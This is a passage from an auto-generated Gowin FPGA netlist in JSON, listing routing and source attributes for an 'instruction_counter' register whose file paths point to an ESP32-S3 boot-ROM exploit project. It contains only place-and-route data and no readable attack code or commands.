"X1Y14/X07;X1Y14/X07/F6;1;X1Y14/CE1;X1Y14/CE1/X07;1;X2Y14/CE1;X2Y14/CE1/X07;1;X1Y14/F6;;1;X1Y14/E260;X1Y14/E260/F6;1;X2Y14/X07;X2Y14/X07/E261;1;X2Y14/CE2;X2Y14/CE2/X07;1" + } + }, + "instruction_counter_DFFE_Q_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7685 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[14]": { + "hide_name": 0, + "bits": [ 7681 ] , + "attributes": { + "ROUTING": "X3Y10/B3;X3Y10/B3/Q3;1;X3Y10/S800;X3Y10/S800/Q3;1;X3Y14/E230;X3Y14/E230/S804;1;X4Y14/N230;X4Y14/N230/E231;1;X4Y13/B1;X4Y13/B1/N231;1;X3Y10/S230;X3Y10/S230/Q3;1;X3Y12/B3;X3Y12/B3/S232;1;X3Y12/W230;X3Y12/W230/S232;1;X3Y12/X08;X3Y12/X08/S232;1;X3Y12/B7;X3Y12/B7/X08;1;X3Y10/Q3;;1;X2Y12/B7;X2Y12/B7/W231;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "instruction_counter_DFFE_Q_9_D": { + "hide_name": 0, + "bits": [ 7679 ] , + "attributes": { + "ROUTING": "X3Y10/F3;;1;X3Y10/XD3;X3Y10/XD3/F3;1" + } + }, + "instruction_counter_DFFE_Q_9_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7677 ] , + "attributes": { + "ROUTING": "X3Y10/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[15]": { + "hide_name": 0, + "bits": [ 7674 ] , + "attributes": { + "ROUTING": "X3Y10/X03;X3Y10/X03/Q4;1;X3Y10/B4;X3Y10/B4/X03;1;X3Y10/EW20;X3Y10/EW20/Q4;1;X4Y10/S220;X4Y10/S220/E121;1;X4Y12/S230;X4Y12/S230/S222;1;X4Y13/B2;X4Y13/B2/S231;1;X2Y12/X03;X2Y12/X03/W241;1;X3Y12/A7;X3Y12/A7/X01;1;X2Y12/A7;X2Y12/A7/X03;1;X3Y10/Q4;;1;X3Y10/S240;X3Y10/S240/Q4;1;X3Y12/X01;X3Y12/X01/S242;1;X3Y12/B4;X3Y12/B4/X01;1;X3Y12/W240;X3Y12/W240/S242;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "instruction_counter_DFFE_Q_8_D": { + "hide_name": 0, + "bits": [ 7672 ] , + "attributes": { + "ROUTING": "X3Y10/F4;;1;X3Y10/XD4;X3Y10/XD4/F4;1" + } + }, + "instruction_counter_DFFE_Q_8_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7670 ] , + "attributes": { + "ROUTING": "X3Y10/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[16]": { + "hide_name": 0, + "bits": [ 7668 ] , + "attributes": { + "ROUTING": "X3Y10/E130;X3Y10/E130/Q5;1;X4Y10/S230;X4Y10/S230/E131;1;X4Y11/A6;X4Y11/A6/S231;1;X3Y10/X08;X3Y10/X08/Q5;1;X3Y10/B5;X3Y10/B5/X08;1;X3Y10/S250;X3Y10/S250/Q5;1;X3Y12/B5;X3Y12/B5/S252;1;X3Y10/Q5;;1;X3Y10/N100;X3Y10/N100/Q5;1;X3Y9/S800;X3Y9/S800/N101;1;X3Y13/E230;X3Y13/E230/S804;1;X4Y13/B3;X4Y13/B3/E231;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_7_D": { + "hide_name": 0, + "bits": [ 7667 ] , + "attributes": { + "ROUTING": "X3Y10/F5;;1;X3Y10/XD5;X3Y10/XD5/F5;1" + } + }, + "instruction_counter_DFFE_Q_7_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7665 ] , + "attributes": { + "ROUTING": "X4Y10/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[17]": { + "hide_name": 0, + "bits": [ 7663 ] , + "attributes": { + "ROUTING": "X4Y11/N130;X4Y11/N130/Q2;1;X4Y10/B0;X4Y10/B0/N131;1;X4Y11/W220;X4Y11/W220/Q2;1;X3Y11/D1;X3Y11/D1/W221;1;X4Y12/X07;X4Y12/X07/S221;1;X4Y12/B0;X4Y12/B0/X07;1;X4Y11/Q2;;1;X4Y11/S220;X4Y11/S220/Q2;1;X4Y13/X01;X4Y13/X01/S222;1;X4Y13/B4;X4Y13/B4/X01;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "instruction_counter_DFFE_Q_6_D": { + "hide_name": 0, + "bits": [ 7661 ] , + "attributes": { + "ROUTING": "X4Y10/F0;;1;X4Y10/S100;X4Y10/S100/F0;1;X4Y11/C2;X4Y11/C2/S101;1;X4Y11/XD2;X4Y11/XD2/C2;1" + } + }, + "instruction_counter_DFFE_Q_6_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7659 ] , + "attributes": { + "ROUTING": "X4Y10/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[18]": { + "hide_name": 0, + "bits": [ 7657 ] , + "attributes": { + "ROUTING": "X4Y10/W250;X4Y10/W250/N111;1;X4Y10/B1;X4Y10/B1/W250;1;X4Y11/SN10;X4Y11/SN10/Q5;1;X4Y12/B1;X4Y12/B1/S111;1;X4Y11/W100;X4Y11/W100/Q5;1;X3Y11/C1;X3Y11/C1/W101;1;X4Y11/Q5;;1;X4Y11/S250;X4Y11/S250/Q5;1;X4Y13/B5;X4Y13/B5/S252;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "instruction_counter_DFFE_Q_5_D": { + "hide_name": 0, + "bits": [ 7655 ] , + "attributes": { + "ROUTING": "X4Y10/F1;;1;X4Y10/S130;X4Y10/S130/F1;1;X4Y11/C5;X4Y11/C5/S131;1;X4Y11/XD5;X4Y11/XD5/C5;1" + } + }, + "instruction_counter_DFFE_Q_5_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7653 ] , + "attributes": { + "ROUTING": "X4Y10/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[19]": { + "hide_name": 0, + "bits": [ 7651 ] , + "attributes": { + "ROUTING": "X4Y10/X01;X4Y10/X01/Q2;1;X4Y10/B2;X4Y10/B2/X01;1;X4Y11/S210;X4Y11/S210/S111;1;X4Y12/B2;X4Y12/B2/S211;1;X5Y13/B0;X5Y13/B0/S212;1;X5Y11/S210;X5Y11/S210/E211;1;X4Y11/E210;X4Y11/E210/S111;1;X4Y11/W210;X4Y11/W210/S111;1;X3Y11/B1;X3Y11/B1/W211;1;X4Y10/SN10;X4Y10/SN10/Q2;1;X4Y10/Q2;;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "instruction_counter_DFFE_Q_4_D": { + "hide_name": 0, + "bits": [ 7649 ] , + "attributes": { + "ROUTING": "X4Y10/F2;;1;X4Y10/XD2;X4Y10/XD2/F2;1" + } + }, + "instruction_counter_DFFE_Q_4_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7647 ] , + "attributes": { + "ROUTING": "X4Y10/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[20]": { + "hide_name": 0, + "bits": [ 7645 ] , + "attributes": { + "ROUTING": "X4Y11/N230;X4Y11/N230/Q3;1;X4Y10/B3;X4Y10/B3/N231;1;X4Y11/W130;X4Y11/W130/Q3;1;X3Y11/A1;X3Y11/A1/W131;1;X4Y11/E130;X4Y11/E130/Q3;1;X5Y11/S230;X5Y11/S230/E131;1;X5Y13/B1;X5Y13/B1/S232;1;X4Y11/S230;X4Y11/S230/Q3;1;X4Y12/B3;X4Y12/B3/S231;1;X4Y11/Q3;;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "instruction_counter_DFFE_Q_3_D": { + "hide_name": 0, + "bits": [ 7643 ] , + "attributes": { + "ROUTING": "X4Y10/F3;;1;X4Y10/SN20;X4Y10/SN20/F3;1;X4Y11/D3;X4Y11/D3/S121;1;X4Y11/XD3;X4Y11/XD3/D3;1" + } + }, + "instruction_counter_DFFE_Q_3_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7641 ] , + "attributes": { + "ROUTING": "X4Y10/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter_DFFE_Q_23_D": { + "hide_name": 0, + "bits": [ 7638 ] , + "attributes": { + "ROUTING": "X1Y8/F2;;1;X1Y8/D4;X1Y8/D4/F2;1;X1Y8/XD4;X1Y8/XD4/D4;1" + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7636 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "instruction_counter[0]": { + "hide_name": 0, + "bits": [ 7635 ] , + "attributes": { + "ROUTING": "X1Y8/X07;X1Y8/X07/Q4;1;X1Y8/A2;X1Y8/A2/X07;1;X1Y8/S130;X1Y8/S130/Q4;1;X1Y9/S270;X1Y9/S270/S131;1;X1Y11/X04;X1Y11/X04/S272;1;X1Y11/SEL3;X1Y11/SEL3/X04;1;X1Y8/S100;X1Y8/S100/Q4;1;X1Y9/S240;X1Y9/S240/S101;1;X1Y11/E240;X1Y11/E240/S242;1;X2Y11/SEL3;X2Y11/SEL3/E241;1;X1Y10/X05;X1Y10/X05/S242;1;X1Y10/B1;X1Y10/B1/X05;1;X1Y8/Q4;;1;X1Y8/S240;X1Y8/S240/Q4;1;X1Y10/S240;X1Y10/S240/S242;1;X1Y12/X07;X1Y12/X07/S242;1;X1Y12/B1;X1Y12/B1/X07;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN": { + "hide_name": 0, + "bits": [ 7633 ] , + "attributes": { + "ROUTING": "X1Y10/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[1]": { + "hide_name": 0, + "bits": [ 7631 ] , + "attributes": { + "ROUTING": "X1Y11/SEL5;X1Y11/SEL5/X01;1;X1Y11/X01;X1Y11/X01/S221;1;X1Y11/SEL1;X1Y11/SEL1/X01;1;X1Y10/X01;X1Y10/X01/Q2;1;X1Y10/B2;X1Y10/B2/X01;1;X2Y11/SEL5;X2Y11/SEL5/S261;1;X1Y10/EW20;X1Y10/EW20/Q2;1;X2Y10/S260;X2Y10/S260/E121;1;X2Y11/SEL1;X2Y11/SEL1/S261;1;X1Y10/Q2;;1;X1Y10/S220;X1Y10/S220/Q2;1;X1Y12/X01;X1Y12/X01/S222;1;X1Y12/B2;X1Y12/B2/X01;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_22_D": { + "hide_name": 0, + "bits": [ 7630 ] , + "attributes": { + "ROUTING": "X1Y10/F2;;1;X1Y10/XD2;X1Y10/XD2/F2;1" + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7628 ] , + "attributes": { + "ROUTING": "X1Y10/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[2]": { + "hide_name": 0, + "bits": [ 7626 ] , + "attributes": { + "ROUTING": "X1Y10/B3;X1Y10/B3/Q3;1;X1Y11/SEL6;X1Y11/SEL6/X08;1;X1Y11/SEL2;X1Y11/SEL2/X08;1;X1Y11/SEL4;X1Y11/SEL4/X08;1;X1Y11/X08;X1Y11/X08/S231;1;X1Y11/SEL0;X1Y11/SEL0/X08;1;X2Y11/SEL6;X2Y11/SEL6/X08;1;X1Y11/S210;X1Y11/S210/S111;1;X1Y13/E210;X1Y13/E210/S212;1;X2Y13/B1;X2Y13/B1/E211;1;X2Y11/X08;X2Y11/X08/E251;1;X2Y11/SEL4;X2Y11/SEL4/X08;1;X1Y10/S230;X1Y10/S230/Q3;1;X1Y12/B3;X1Y12/B3/S232;1;X2Y11/SEL0;X2Y11/SEL0/X08;1;X1Y11/E250;X1Y11/E250/S111;1;X2Y11/SEL2;X2Y11/SEL2/X08;1;X1Y10/Q3;;1;X1Y10/SN10;X1Y10/SN10/Q3;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_21_D": { + "hide_name": 0, + "bits": [ 7625 ] , + "attributes": { + "ROUTING": "X1Y10/F3;;1;X1Y10/XD3;X1Y10/XD3/F3;1" + } + }, + "instruction_counter_DFFE_Q_21_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7623 ] , + "attributes": { + "ROUTING": "X1Y10/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[3]": { + "hide_name": 0, + "bits": [ 7621 ] , + "attributes": { + "ROUTING": "X4Y11/X07;X4Y11/X07/Q4;1;X4Y11/B6;X4Y11/B6/X07;1;X4Y11/SN20;X4Y11/SN20/Q4;1;X4Y10/W220;X4Y10/W220/N121;1;X2Y10/W230;X2Y10/W230/W222;1;X1Y10/B4;X1Y10/B4/W231;1;X1Y12/B4;X1Y12/B4/W231;1;X4Y11/S130;X4Y11/S130/Q4;1;X2Y12/W230;X2Y12/W230/W232;1;X4Y12/W230;X4Y12/W230/S131;1;X4Y11/Q4;;1;X4Y11/W240;X4Y11/W240/Q4;1;X2Y11/S240;X2Y11/S240/W242;1;X2Y13/X01;X2Y13/X01/S242;1;X2Y13/B2;X2Y13/B2/X01;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_20_D": { + "hide_name": 0, + "bits": [ 7620 ] , + "attributes": { + "ROUTING": "X1Y10/F4;;1;X1Y10/S100;X1Y10/S100/F4;1;X1Y11/E200;X1Y11/E200/S101;1;X3Y11/E200;X3Y11/E200/E202;1;X4Y11/D4;X4Y11/D4/E201;1;X4Y11/XD4;X4Y11/XD4/D4;1" + } + }, + "instruction_counter[21]": { + "hide_name": 0, + "bits": [ 7618 ] , + "attributes": { + "ROUTING": "X4Y11/E240;X4Y11/E240/S241;1;X5Y11/C7;X5Y11/C7/E241;1;X4Y10/W100;X4Y10/W100/Q4;1;X4Y10/B4;X4Y10/B4/W100;1;X4Y10/S240;X4Y10/S240/Q4;1;X4Y12/X03;X4Y12/X03/S242;1;X4Y12/B4;X4Y12/B4/X03;1;X4Y10/Q4;;1;X4Y10/E130;X4Y10/E130/Q4;1;X5Y10/S230;X5Y10/S230/E131;1;X5Y12/S230;X5Y12/S230/S232;1;X5Y13/B2;X5Y13/B2/S231;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_2_D": { + "hide_name": 0, + "bits": [ 7617 ] , + "attributes": { + "ROUTING": "X4Y10/F4;;1;X4Y10/XD4;X4Y10/XD4/F4;1" + } + }, + "instruction_counter_DFFE_Q_1_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7615 ] , + "attributes": { + "ROUTING": "X5Y10/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter_DFFE_Q_2_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7614 ] , + "attributes": { + "ROUTING": "X4Y10/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter_DFFE_Q_20_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7612 ] , + "attributes": { + "ROUTING": "X1Y10/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[4]": { + "hide_name": 0, + "bits": [ 7610 ] , + "attributes": { + "ROUTING": "X1Y10/E250;X1Y10/E250/Q5;1;X1Y10/B5;X1Y10/B5/E250;1;X1Y11/W260;X1Y11/W260/S121;1;X1Y11/D7;X1Y11/D7/W260;1;X1Y10/SN20;X1Y10/SN20/Q5;1;X1Y11/E220;X1Y11/E220/S121;1;X2Y11/D0;X2Y11/D0/E221;1;X1Y10/S250;X1Y10/S250/Q5;1;X1Y12/B5;X1Y12/B5/S252;1;X1Y10/Q5;;1;X1Y10/S130;X1Y10/S130/Q5;1;X1Y11/S230;X1Y11/S230/S131;1;X1Y13/E230;X1Y13/E230/S232;1;X2Y13/B3;X2Y13/B3/E231;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_19_D": { + "hide_name": 0, + "bits": [ 7609 ] , + "attributes": { + "ROUTING": "X1Y10/F5;;1;X1Y10/XD5;X1Y10/XD5/F5;1" + } + }, + "instruction_counter_DFFE_Q_19_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7607 ] , + "attributes": { + "ROUTING": "X2Y10/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[5]": { + "hide_name": 0, + "bits": [ 7605 ] , + "attributes": { + "ROUTING": "X2Y10/S200;X2Y10/S200/Q0;1;X2Y12/X07;X2Y12/X07/S202;1;X2Y12/B0;X2Y12/B0/X07;1;X2Y10/B0;X2Y10/B0/S100;1;X2Y11/C0;X2Y11/C0/S101;1;X2Y10/S130;X2Y10/S130/Q0;1;X2Y11/S270;X2Y11/S270/S131;1;X2Y13/B4;X2Y13/B4/S272;1;X2Y10/Q0;;1;X2Y10/S100;X2Y10/S100/Q0;1;X2Y11/W240;X2Y11/W240/S101;1;X1Y11/C7;X1Y11/C7/W241;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_18_D": { + "hide_name": 0, + "bits": [ 7604 ] , + "attributes": { + "ROUTING": "X2Y10/F0;;1;X2Y10/XD0;X2Y10/XD0/F0;1" + } + }, + "instruction_counter_DFFE_Q_18_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7602 ] , + "attributes": { + "ROUTING": "X2Y10/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[6]": { + "hide_name": 0, + "bits": [ 7600 ] , + "attributes": { + "ROUTING": "X2Y10/B1;X2Y10/B1/Q1;1;X2Y10/S210;X2Y10/S210/Q1;1;X2Y12/B1;X2Y12/B1/S212;1;X1Y11/B7;X1Y11/B7/W211;1;X2Y13/B5;X2Y13/B5/S252;1;X2Y11/S250;X2Y11/S250/S111;1;X2Y10/Q1;;1;X2Y11/B0;X2Y11/B0/S111;1;X2Y11/W210;X2Y11/W210/S111;1;X2Y10/SN10;X2Y10/SN10/Q1;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_17_D": { + "hide_name": 0, + "bits": [ 7599 ] , + "attributes": { + "ROUTING": "X2Y10/F1;;1;X2Y10/XD1;X2Y10/XD1/F1;1" + } + }, + "instruction_counter_DFFE_Q_17_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7597 ] , + "attributes": { + "ROUTING": "X2Y10/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[7]": { + "hide_name": 0, + "bits": [ 7595 ] , + "attributes": { + "ROUTING": "X2Y10/X01;X2Y10/X01/Q2;1;X2Y10/B2;X2Y10/B2/X01;1;X2Y12/X01;X2Y12/X01/S222;1;X2Y12/B2;X2Y12/B2/X01;1;X2Y11/A0;X2Y11/A0/X01;1;X3Y10/S220;X3Y10/S220/E221;1;X3Y12/S230;X3Y12/S230/S222;1;X3Y13/B0;X3Y13/B0/S231;1;X2Y10/S220;X2Y10/S220/Q2;1;X2Y10/E220;X2Y10/E220/Q2;1;X2Y11/X01;X2Y11/X01/S221;1;X1Y10/S210;X1Y10/S210/W111;1;X2Y10/EW10;X2Y10/EW10/Q2;1;X1Y11/A7;X1Y11/A7/S211;1;X2Y10/Q2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_16_D": { + "hide_name": 0, + "bits": [ 7594 ] , + "attributes": { + "ROUTING": "X2Y10/F2;;1;X2Y10/XD2;X2Y10/XD2/F2;1" + } + }, + "instruction_counter_DFFE_Q_16_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7592 ] , + "attributes": { + "ROUTING": "X2Y10/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "instruction_counter[8]": { + "hide_name": 0, + "bits": [ 7590 ] , + "attributes": { + "ROUTING": 